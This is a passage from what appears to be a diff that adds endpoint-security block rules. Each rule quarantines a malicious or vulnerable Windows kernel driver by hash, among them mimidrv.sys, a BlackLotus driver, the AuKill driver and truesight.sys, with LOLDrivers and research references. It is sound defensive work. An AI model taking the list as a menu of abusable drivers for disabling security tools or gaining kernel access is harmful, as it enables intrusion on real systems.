+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9088392c38d6b8b7cbcc0959d51f0440f211b037408314b51d393b8aa83d44eb",
+ "comment": "Malicious Kernel Driver (aka driver_ef9d653a.sys) [https://www.loldrivers.io/drivers/14e51012-5429-483e-9423-49778c3bd1c2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6dae4cd0-8504-5651-acbc-da9c361e0769",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453978Z",
+ "creation_date": "2026-03-23T11:45:30.453981Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453990Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "497a836693be1b330993e2be64f6c71bf290c127faca1c056abd0dc374654830",
+ "comment": "Malicious Kernel Driver (aka a236e7d654cd932b7d11cb604629a2d0.sys) [https://www.loldrivers.io/drivers/2866bd72-a4b1-4764-a838-9ed0790c2631/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6dc453fd-fd35-5583-8d13-4ee8acb8699e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611359Z",
+ "creation_date": "2026-03-23T11:45:29.611361Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611366Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "abf635a246752555868f203a565ead519c9ada06ea007545a47bf352678c342a",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6dcd1acb-cb65-5f6d-9d99-d3bc6bd6a1f5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464912Z",
+ "creation_date": "2026-03-23T11:45:30.464915Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464923Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62036cdf3663097534adf3252b921eed06b73c2562655eae36b126c7d3d83266",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6dcd538a-587d-527f-8a3a-21829db2b0bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819394Z",
+ "creation_date": "2026-03-23T11:45:30.819396Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819401Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d2da77e10d2fd2b8b2aa68ab4af1483ef270311c846644e0ec61ace146ee6feb",
+ "comment": "Vulnerable Kernel Driver (aka VdBSv64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6dd41b7f-04af-5749-bb5b-4d2f6c5e8f41",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978135Z",
+ "creation_date": "2026-03-23T11:45:29.978137Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978143Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "749b0e8c8c8b7dda8c2063c708047cfe95afa0a4d86886b31a12f3018396e67c",
+ "comment": "Malicious Kernel Driver (aka 0x3040_blacklotus_beta_driver.sys) [https://www.loldrivers.io/drivers/8750b245-af35-4bc6-9af3-dc858f9db64f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6dd4a3c5-140b-5d17-a24d-fd64ee2e0520",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835295Z",
+ "creation_date": "2026-03-23T11:45:30.835298Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835307Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a907bd5cddfab8ee41a02f6ad9ba6c6848bd9c1017611435f0867b2e236a07b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6df6947b-6884-599d-a679-8e99d41f1d64",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968004Z",
+ "creation_date": "2026-03-23T11:45:29.968006Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968012Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f5e3d33c824f9f03d038b4f1a376b15cc5f1694aef086bd17c516ad951fc45a",
+ "comment": "Projector Rootkit malicious drivers (aka KB_VRX_deviced.sys) [https://twitter.com/struppigel/status/1551503748601729025] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e085625-9299-5c1f-b73a-32e977660209",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146778Z",
+ "creation_date": "2026-03-23T11:45:31.146779Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146785Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "54d5272af19864d81cd4902d76a651510c7d58295e5f4fb2f8053ebe499982dd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e0da02f-47bb-5feb-b522-3b11714163d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153489Z",
+ "creation_date": "2026-03-23T11:45:31.153491Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153496Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "51fcbd96e216fb82900db6ea5046a89cec680c8965f0d9a26e1aedf71acbf8eb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e17fc26-e435-5bc8-9f39-99be4e3ebaf6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973357Z",
+ "creation_date": "2026-03-23T11:45:29.973359Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973365Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fabe94809d90ade89dad012b22243e3fb755a131800140f8f8b30c989c371301",
+ "comment": "Voicemod Sociedad Limitada vulnerable driver (aka vmdrv.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e26a745-2dd2-5fa6-8655-b3ea3b7f88b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153701Z",
+ "creation_date": "2026-03-23T11:45:31.153703Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153708Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "28e471f0741ecac18102c0a407310d53cf0e962965adaafa53123b9bf349fe5e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e2710d7-b12f-51d8-b333-db37338c9f71",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155154Z",
+ "creation_date": "2026-03-23T11:45:31.155156Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155161Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f55e87dc3ccf449c3df04a227b3c38f0ab151563904ec75faf09a9e6ad81b69",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e346ae4-4915-574b-9971-1aed1c11c946",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827586Z",
+ "creation_date": "2026-03-23T11:45:31.827588Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827593Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1508b3bcd0368bc487e0af59f88148f2e5a16685d1ca05d5aa0d9aa982999493",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e4d6306-3ea4-5396-b5a1-97895f1bc71d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154978Z",
+ "creation_date": "2026-03-23T11:45:31.154980Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154986Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8970d3c8889a4f6d7bb6228d331f0f30de2a7f6a287b37d23a20cd12d36eb728",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e64165c-5713-53f9-8c1c-537b25014d5a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823536Z",
+ "creation_date": "2026-03-23T11:45:30.823538Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823544Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "852d83d1cb676d150286edb1eccc7dba4c5acc06027361f96721a0a75f1a7884",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e675e6c-80b2-57f4-9d94-7db2e39d9d0e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823644Z",
+ "creation_date": "2026-03-23T11:45:30.823647Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823652Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "456216f68ea370a72c5a4994b64809114edad1357cea269af57b96b44923a484",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e75b3b5-c905-5cd5-b67d-d0b91e2eb598",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472980Z",
+ "creation_date": "2026-03-23T11:45:30.472983Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472992Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "53bd8e8d3542fcf02d09c34282ebf97aee9515ee6b9a01cefd81baa45c6fd3d6",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e81b540-f4fe-5c58-b988-c69ab84fbde5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980271Z",
+ "creation_date": "2026-03-23T11:45:29.980273Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980279Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9eba5d1545fdbf37cf053ac3f3ba45bcb651b8abb7805cbfdfb5f91ea294fb95",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e96b5c3-e155-5b2b-bd3a-0ce0eb7cc6e8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487080Z",
+ "creation_date": "2026-03-23T11:45:31.487083Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487092Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "44d76b4ee4e9a0ad0eb3c40fc6ae66d91c33155da86b5f15a6ebd9564cf30130",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e9ce2a7-c644-5130-9db4-b0d56ee11bf7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151754Z",
+ "creation_date": "2026-03-23T11:45:31.151757Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151764Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "baa6847981a0c77a1c657431167a43ebcfd0ffe32ddf8379f6a65315c34a549d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e9e3066-2f4b-5fad-b9e4-2e8a0cd60ab5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489040Z",
+ "creation_date": "2026-03-23T11:45:31.489042Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489047Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a36482e8713d29d620b8b759812324d74fa63ce221ff518f807f3f3db569b3d7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6e9e5995-7311-57d2-b4c6-b18b5e1b8fad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976800Z",
+ "creation_date": "2026-03-23T11:45:29.976802Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976808Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0c8a373fff42c69f51cc4ae12295df8b75e7e29fd4956dbc3582bf284b883ddc",
+ "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [file SHA256]",
